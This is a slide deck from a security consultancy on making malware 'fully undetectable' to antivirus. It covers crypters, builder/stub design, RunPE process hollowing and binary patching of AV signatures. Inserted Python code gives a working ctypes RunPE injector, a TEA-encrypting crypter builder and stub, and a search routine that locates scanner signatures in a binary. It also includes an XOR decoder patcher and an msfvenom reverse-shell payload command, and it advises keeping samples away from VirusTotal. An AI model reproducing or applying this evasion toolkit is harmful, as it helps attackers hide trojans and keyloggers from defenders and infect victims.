2. Whoami
ncd:~ apasamar$ whoami
apasamar
apasamar@incide.es
@apasamar
a.k.a brajan
ncd:~ apasamar$ cat apasamar.cv
Electrical Engineer and Master in
Information Security
Co-founder of INCIDE:
Electronic Evidence Experts
Forensics / Expert Witness Reports
Incident Response
IT Security Auditors and Consultants
ncd:~ apasamar$ rm apasamar.cv
3. what is this about...
• Introduction
• AVs: how they work
• Malware types and AV detection
• Evasion techniques
• Self-encryption, polymorphism, obfuscation, compression
• Crypters
• types
• stub
• FUD stub
• Modding techniques
• Resources
8. AV howto
• Classic antivirus scanning works on the binaries on the HARD DISK
• It does not scan MEMORY, only the binaries that 'start' the running
processes (caveat: modern engines do add memory scanning and behaviour
monitoring, so this is weaker today than when these slides were written)
• Scan for signatures: byte sequences stored in the AV database
• Look for malicious techniques (heuristics): suspicious APIs,
functions, XOR loops, etc.
• Sandbox (partial execution): look for decryption routines, etc.
11. AV howto
• Recommended:
“Abusing File Processing in Malware Detectors for Fun and Profit” (2012)
Suman Jana and Vitaly Shmatikov
The University of Texas at Austin
12. AV howto
• Metasploit Framework (Rapid7)
• Community Edition:
• msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -t exe -x notepad.exe > notepad2.exe
(-t exe is required for msfencode to honour the -x template; without it
the output is raw shellcode. msfpayload/msfencode were retired in 2015;
the msfvenom equivalent is:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 -e x86/shikata_ga_nai -i 5 -x notepad.exe -f exe -o notepad2.exe
shikata_ga_nai output has been signatured by most engines for years, so
this is a baseline to measure against, not an evasion technique by itself)
• Pro Edition:
• Generate AV-evading Dynamic Payloads
13. types of malware and AV detection
• Commercial spy programs: (whitelisted, signed)
• e-blaster
• 007
• perfect keylogger
• …
14. types of malware and AV detection
• Newly created malware:
• LOW detection (NO known signatures)
• possible heuristic detections
15. types of malware and AV detection
• Existing malware: (very well known, signature and heuristic
detections)
• trojans (BiFrost, PoisonIvy, CyberGate, SpyNet, DarkComet)
• downloaders
• password stealers
• reverse shells
16. How can we make malware that AV already detects undetectable?
• C r y p t e r s:
• Software that encrypts ANY MALWARE so that the file on disk no longer
matches the signatures the AV has for it; the malware is only decrypted
in memory at run time.
18. builder / stub
• Builder:
• Responsible for creating the NEW EXEcutable, composed of the STUB
and the ENCRYPTED MALWARE
• Stub:
• Its mission is to decrypt and run the ENCRYPTED MALWARE (in memory,
without ever writing the decrypted file to disk)
25. RunPE or Dynamic Forking
(diagram; the call sequence it shows:)
• CreateProcess on the host executable (PROCESS 1) with CREATE_SUSPENDED
• GetThreadContext on its main thread: EBX points at the PEB, EAX holds
the entry point (EP 1); PEB+8 is the ImageBaseAddress (BaseAddress 1)
• ReadFile the encrypted payload and decrypt it; WriteProcessMemory the
decrypted image (PROCESS 2) at BaseAddress 2 and write BaseAddress 2
into PEB+8
• Set EAX to EP 2, SetThreadContext, ResumeThread: the host process now
runs the payload
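The sequence in the diagram, written out as an added example (this is not the slides' own stub code). parse_pe() and build_image() are portable and show the part most RunPE write-ups skip: turning the file layout into the memory layout that gets written into the hollowed process. run_pe() is the Win32 call chain itself via ctypes; it assumes a 32-bit Python on Windows, a 32-bit payload, the x86 CONTEXT layout (EBX at 0xA4, EAX at 0xB0), PEB+8 being ImageBaseAddress, and a payload that does not need relocation. make_toy_pe() builds a constructed minimal PE for the portable functions to chew on.

```python
"""RunPE / dynamic forking, as an added example (not the slides' code).
parse_pe() and build_image() are portable; run_pe() is the Win32 call
sequence from the diagram and only works from a 32-bit Python on Windows
with a 32-bit payload (assumptions: x86 CONTEXT layout, PEB+8 ==
ImageBaseAddress, no relocation handling)."""
import struct
import sys


def parse_pe(data: bytes) -> dict:
    """Fields RunPE needs from a PE32 (x86) file."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]           # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24                                          # optional header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("PE32 (x86) only")
    entry = struct.unpack_from("<I", data, opt + 16)[0]     # AddressOfEntryPoint
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    size_image, size_headers = struct.unpack_from("<II", data, opt + 56)
    sections = []
    for i in range(nsec):
        name, _vsize, va, rawsize, rawptr = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0"), va, rawsize, rawptr))
    return {"entry": entry, "image_base": image_base, "size_image": size_image,
            "size_headers": size_headers, "sections": sections}


def build_image(data: bytes) -> bytes:
    """File layout -> memory layout: headers at 0, each section at its RVA,
    zero-filled gaps. This is the buffer the stub copies into the host."""
    pe = parse_pe(data)
    img = bytearray(pe["size_image"])
    img[:pe["size_headers"]] = data[:pe["size_headers"]]
    for _name, va, rawsize, rawptr in pe["sections"]:
        chunk = data[rawptr:rawptr + rawsize]
        img[va:va + len(chunk)] = chunk
    return bytes(img)


def run_pe(host_path: str, payload: bytes) -> int:
    """Windows-only: CreateProcess(SUSPENDED) -> GetThreadContext -> unmap the
    host image -> VirtualAllocEx + WriteProcessMemory -> patch PEB+8 and EAX
    -> SetThreadContext -> ResumeThread. Returns the process handle."""
    import ctypes
    if sys.platform != "win32" or ctypes.sizeof(ctypes.c_void_p) != 4:
        raise OSError("run_pe needs a 32-bit Python on Windows")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    ntdll = ctypes.WinDLL("ntdll")
    pe, image = parse_pe(payload), build_image(payload)
    si = ctypes.create_string_buffer(68)                   # STARTUPINFOA, cb = 68
    struct.pack_into("<I", si, 0, 68)
    pi = ctypes.create_string_buffer(16)                   # PROCESS_INFORMATION
    if not k32.CreateProcessA(host_path.encode(), None, None, None, False,
                              0x4, None, None, si, pi):    # 0x4 = CREATE_SUSPENDED
        raise ctypes.WinError(ctypes.get_last_error())
    hproc, hthread = struct.unpack_from("<II", pi, 0)
    ctx = ctypes.create_string_buffer(716)                 # x86 CONTEXT
    struct.pack_into("<I", ctx, 0, 0x10007)                # CONTEXT_FULL
    if not k32.GetThreadContext(hthread, ctx):
        raise ctypes.WinError(ctypes.get_last_error())
    ebx = struct.unpack_from("<I", ctx, 0xA4)[0]           # EBX -> PEB
    old_base = ctypes.c_uint32()                           # PEB+8 = ImageBaseAddress
    k32.ReadProcessMemory(hproc, ebx + 8, ctypes.byref(old_base), 4, None)
    ntdll.NtUnmapViewOfSection(hproc, old_base.value)      # free the host image
    base = k32.VirtualAllocEx(hproc, pe["image_base"], pe["size_image"],
                              0x3000, 0x40)                # COMMIT|RESERVE, RWX
    if not base:
        raise ctypes.WinError(ctypes.get_last_error())
    k32.WriteProcessMemory(hproc, base, image, len(image), None)
    k32.WriteProcessMemory(hproc, ebx + 8, struct.pack("<I", base), 4, None)
    struct.pack_into("<I", ctx, 0xB0, base + pe["entry"])  # EAX = new EP
    k32.SetThreadContext(hthread, ctx)
    k32.ResumeThread(hthread)
    return hproc


def make_toy_pe() -> bytes:
    """Constructed minimal PE32 (one .text section holding `jmp $`): enough
    header for parse_pe()/build_image(), not a real program."""
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)             # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)  # i386, 1 section
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)
    # EP, ImageBase, SectionAlignment, FileAlignment, SizeOfImage, SizeOfHeaders
    for off, val in ((16, 0x1000), (28, 0x400000), (32, 0x1000),
                     (36, 0x200), (56, 0x2000), (60, 0x200)):
        struct.pack_into("<I", opt, off, val)
    code = b"\xEB\xFE" + b"\x90" * 14
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(code), 0x1000, 0x200,
                      0x200, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + coff + bytes(opt) + sec).ljust(0x200, b"\0")
    return headers + code.ljust(0x200, b"\0")
```

Two things the diagram glosses over and this code makes explicit: the host image is unmapped first (NtUnmapViewOfSection) so the payload can land at its own preferred base, and the new base is written into the PEB as well as into EAX, otherwise the loader in the resumed process still believes the old image is there.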
26. FUD
• Target: FUD Stub (Fully UnDetectable)
• From Source Code
• From Binary Code
• How?
• MODDING
27. modding source code
• Manually or using obfuscation tools:
• Function replacement (SPLIT, ...)
• Function/string/variable renaming and obfuscation; rot13 or hex
encoding of strings
• Encryption: RC4 and XOR loops are very well known to AV heuristics
• Alternatives: TEA, DES, etc.
• Alternative RunPE routines
• Fake APIs
• TLB (Type Library file, used instead of Declare statements for API
calls)
• Trash code
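The builder/stub split from slide 18 together with the "use TEA instead of RC4/XOR" advice above, as one added example (not the slides' or any real crypter's code). The builder appends the TEA-encrypted payload and a trailer to the stub image; the stub reads its own file, finds the trailer and decrypts, which is the point where a real stub would call RunPE. TEA is the textbook 32-round cipher run in counter mode so no padding is needed; the trailer layout, marker and the choice to carry the key in the trailer (a real stub would hide it in code) are assumptions made for the example.

```python
"""Builder / stub split of a crypter with TEA-CTR, as an added example
(not the slides' code). Layout of the appended data is an assumption."""
import struct

MASK = 0xFFFFFFFF
DELTA = 0x9E3779B9
TRAILER = b"STUB"           # assumed marker the stub searches for


def tea_encrypt_block(v0: int, v1: int, k: tuple) -> tuple:
    """One 64-bit TEA block with a 128-bit key given as four 32-bit words."""
    s = 0
    for _ in range(32):
        s = (s + DELTA) & MASK
        v0 = (v0 + ((((v1 << 4) & MASK) + k[0]) ^ ((v1 + s) & MASK)
                    ^ ((v1 >> 5) + k[1]))) & MASK
        v1 = (v1 + ((((v0 << 4) & MASK) + k[2]) ^ ((v0 + s) & MASK)
                    ^ ((v0 >> 5) + k[3]))) & MASK
    return v0, v1


def tea_ctr(data: bytes, key: bytes, nonce: int) -> bytes:
    """TEA in counter mode: keystream block i = TEA(nonce, i). XOR-based,
    so the same call encrypts and decrypts and needs no padding."""
    k = struct.unpack("<4I", key)
    out = bytearray()
    for i in range(0, len(data), 8):
        a, b = tea_encrypt_block(nonce & MASK, i // 8, k)
        ks = struct.pack("<2I", a, b)
        out += bytes(x ^ y for x, y in zip(data[i:i + 8], ks))
    return bytes(out)


def build(stub: bytes, malware: bytes, key: bytes, nonce: int) -> bytes:
    """Builder: new EXE = stub image + encrypted payload + trailer.
    Trailer = key(16) | nonce(4) | payload length(4) | marker(4)."""
    if len(key) != 16:
        raise ValueError("TEA key must be 16 bytes")
    enc = tea_ctr(malware, key, nonce)
    return stub + enc + key + struct.pack("<II", nonce, len(enc)) + TRAILER


def stub_extract(self_image: bytes) -> bytes:
    """Stub side: given our own file contents, locate the trailer and
    decrypt the payload. A real stub hands the result to RunPE here."""
    if not self_image.endswith(TRAILER):
        raise ValueError("no payload attached")
    t = len(self_image) - len(TRAILER) - 24      # start of the key
    key = self_image[t:t + 16]
    nonce, length = struct.unpack("<II", self_image[t + 16:t + 24])
    return tea_ctr(self_image[t - length:t], key, nonce)
```

The cipher change only buys anything if the decryption loop itself does not look like the RC4/XOR loops the heuristics key on; the builder is never shipped, so only stub_extract() and tea_ctr() are exposed to the scanner.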
29. modding binary file
• We have to undetect the STUB; the BUILDER is only a tool used at home,
not in the wild
• The first step is to FIND the AV SIGNATURES:
• Simple signatures
• Multiple signatures
• Heuristic signatures
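Finding where a signature sits in the stub, as an added example (not the slides' tool): wipe ranges of the file, re-scan, and narrow down. In practice `detects` would wrap a local command-line scanner (never an online multi-scanner, for the reason slide 32 gives); here it is a constructed stand-in that fires on a list of byte patterns. The search also handles the "multiple signatures" case by wiping each one it isolates and repeating, and it assumes the fill byte (0x00) never forms a match on its own.

```python
"""Binary-search a file for the bytes an AV signature matches, as an added
example (not the slides' tool). `detects` is a constructed stand-in here."""


def find_signatures(blob: bytes, detects) -> list:
    """Return [(start, end), ...] ranges which, when zeroed, stop the scanner.
    Per signature: smallest suffix that can be wiped (its end), then the
    largest prefix that can be wiped with that suffix gone (its start).
    Independent signatures are found one at a time; a detection that needs
    two separate parts is reported as one range spanning both."""
    buf = bytearray(blob)
    n = len(buf)
    found = []

    def zeroed(start, end, start2=n, end2=n):
        t = bytearray(buf)
        t[start:end] = bytes(end - start)
        t[start2:end2] = bytes(end2 - start2)
        return bytes(t)

    while detects(bytes(buf)):
        lo, hi = 0, n                  # smallest e: zeroing [e, n) keeps the hit
        while lo < hi:
            mid = (lo + hi) // 2
            if detects(zeroed(mid, n)):
                hi = mid
            else:
                lo = mid + 1
        end = lo
        lo, hi = 0, end                # largest s: zeroing [0, s) + [end, n) keeps it
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if detects(zeroed(0, mid, end, n)):
                lo = mid
            else:
                hi = mid - 1
        start = lo
        if end <= start:
            raise RuntimeError("scanner fires on zeroed data; cannot isolate")
        found.append((start, end))
        buf[start:end] = bytes(end - start)   # wipe it, look for the next one
    return found


class MockScanner:
    """Constructed stand-in for an AV scanner: fires on any listed pattern
    and counts how many scans the search needed."""

    def __init__(self, patterns):
        self.patterns = patterns
        self.scans = 0

    def __call__(self, data: bytes) -> bool:
        self.scans += 1
        return any(p in data for p in self.patterns)


def demo():
    """Constructed sample: 1 KiB of non-zero filler with two planted
    'signatures'; returns the ranges found and the scan count."""
    filler = bytearray((bytes(range(1, 256)) * 5)[:1024])
    filler[100:108] = b"EVILSIG1"
    filler[700:708] = b"BADSTUFF"
    scanner = MockScanner([b"EVILSIG1", b"BADSTUFF"])
    return find_signatures(bytes(filler), scanner), scanner.scans
```

Each signature costs about 2*log2(size) scans rather than one scan per chunk, which matters when every scan is a full engine invocation. Once a range is known, the RIT or XOR technique from the later slides is applied to exactly those bytes.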
31. modding binary file
• What if we use a simple encryption/decryption routine inside the STUB?
(diagram: left, the original stub.exe with its EP and the signatured
bytes; right, the modified stub.exe where the OLD EP and the signatures
are encrypted and a NEW EP points at the decryption routine)
32. modding binary file
• ORIGINAL STUB MULTIPLE AV SCAN
Do NOT use VirusTotal for these scans or your STUB samples will be sent
to AV companies :(
33. modding binary file
• ENCRYPTION ROUTINE
• NEW EP
• INSERT the ROUTINE in the .text SECTION, from offset 1050 up to the
Import Table
34. modding binary file
• ENCRYPTION ROUTINE AT NEW EP
• used only once, to encrypt the .text section
• Set a breakpoint here, after the encryption routine, and save the
encrypted section back to the file; at run time the routine at the new
EP undoes it
40. modding binary file
• RIT technique
• Find the AV signature
• If the signature sits on instruction bytes: break the flow there
• Jump to another address (a hole in the section where you can write
your code)
• Execute the displaced instructions there
• Return/jump to the appropriate instruction
41. modding binary file
• XOR technique
• Find the AV signature
• XOR each detected byte with any value, e.g. 22
• Modify the EP or jump to your hole
• There, XOR the modified bytes with 22 again (restoring them; the
section must be writable for this)
• Return/jump to the appropriate instruction
42. modding binary file
(screenshots, captions only:)
• Detected bytes (EP)
• XOR of the detected bytes
• New EP (XORs and jump to original EP)
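The XOR technique end to end, as an added example (not the slides' tool): XOR the signatured bytes in place, put a hand-assembled decoder in a hole in the section as the new EP, and let it XOR the bytes back before jumping to the old EP. With `n` set to the size of the .text section the same loop is the "simple encryption routine" of slides 31 to 34. emulate() is a constructed interpreter for the six opcodes the decoder uses, there only to show the round trip; the image base, offsets and the "detected" bytes are assumptions.

```python
"""XOR technique with a hand-assembled decoder, as an added example (not
the slides' tool). emulate() is a constructed six-opcode interpreter."""
import struct


def xor_patch(image: bytearray, off: int, n: int, key: int) -> None:
    """Step 1 (offline, once): XOR the detected bytes so the signature is
    no longer present on disk."""
    for i in range(off, off + n):
        image[i] ^= key


def build_decoder(decoder_va: int, target_va: int, n: int, key: int,
                  old_ep_va: int) -> bytes:
    """Step 2: code placed at the new EP (21 bytes):
         B8 imm32   mov eax, target        B9 imm32   mov ecx, n
         80 30 kk   xor byte [eax], key    40         inc eax
         E2 FA      loop -6 (to the xor)   E9 rel32   jmp old_ep
    The section holding target must be writable (set IMAGE_SCN_MEM_WRITE)."""
    code = b"\xB8" + struct.pack("<I", target_va)
    code += b"\xB9" + struct.pack("<I", n)
    code += b"\x80\x30" + bytes([key]) + b"\x40" + b"\xE2\xFA"
    jmp_at = decoder_va + len(code)
    code += b"\xE9" + struct.pack("<i", old_ep_va - (jmp_at + 5))
    return code


def emulate(image: bytearray, base: int, eip: int, max_steps: int = 100000) -> int:
    """Constructed mini-interpreter for exactly the opcodes build_decoder
    emits (not a real CPU). Runs until the final jmp; returns its target."""
    eax = ecx = 0
    for _ in range(max_steps):
        off = eip - base
        op = image[off]
        if op == 0xB8:                                  # mov eax, imm32
            eax, eip = struct.unpack_from("<I", image, off + 1)[0], eip + 5
        elif op == 0xB9:                                # mov ecx, imm32
            ecx, eip = struct.unpack_from("<I", image, off + 1)[0], eip + 5
        elif op == 0x80 and image[off + 1] == 0x30:     # xor byte [eax], imm8
            image[eax - base] ^= image[off + 2]
            eip += 3
        elif op == 0x40:                                # inc eax
            eax, eip = (eax + 1) & 0xFFFFFFFF, eip + 1
        elif op == 0xE2:                                # loop rel8
            ecx = (ecx - 1) & 0xFFFFFFFF
            eip += 2
            if ecx:
                eip += struct.unpack_from("<b", image, off + 1)[0]
        elif op == 0xE9:                                # jmp rel32
            return eip + 5 + struct.unpack_from("<i", image, off + 1)[0]
        else:
            raise ValueError("opcode %02X not supported" % op)
    raise RuntimeError("decoder did not terminate")


def demo():
    """Constructed 256-byte 'section' at an assumed base: old EP at 0x10
    carries an 8-byte pattern the scanner fires on, a hole at 0x80 takes
    the decoder. Returns (signature still on disk?, landed on old EP?,
    bytes restored in memory?)."""
    base, old_ep, hole, key = 0x401000, 0x10, 0x80, 0x22
    sig = b"\x55\x8B\xEC\x83\xEC\x10\x56\x57"    # assumed detected bytes at EP
    image = bytearray(256)
    image[old_ep:old_ep + len(sig)] = sig
    xor_patch(image, old_ep, len(sig), key)
    dec = build_decoder(base + hole, base + old_ep, len(sig), key, base + old_ep)
    image[hole:hole + len(dec)] = dec
    on_disk = bytes(image)
    landed = emulate(image, base, base + hole)
    restored = bytes(image[old_ep:old_ep + len(sig)]) == sig
    return sig in on_disk, landed == base + old_ep, restored
```

The decoder is itself a small, fixed byte pattern, so once an engine signatures it the same search-and-patch cycle starts again on the decoder; that is why the later slides talk about fake APIs and junk code rather than a single fixed trick.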
43. other techniques
• Add fake APIs
• Hex-edit strings
• Move/change function calls
• Change the function call type: by name / by ordinal (offset)
• Insert the detected DLL function into the stub code
45. Avda. Diagonal, 640 6ª Planta
08017 Barcelona (Spain)
info@incide.es
http://www.incide.es
http://www.twitter.com/1NC1D3
http://www.atrapadosporlosbits.com
http://www.youtube.com/incidetube
Tel./Fax. +34 932 546 277 / +34 932 546 314
ANY QUESTIONS?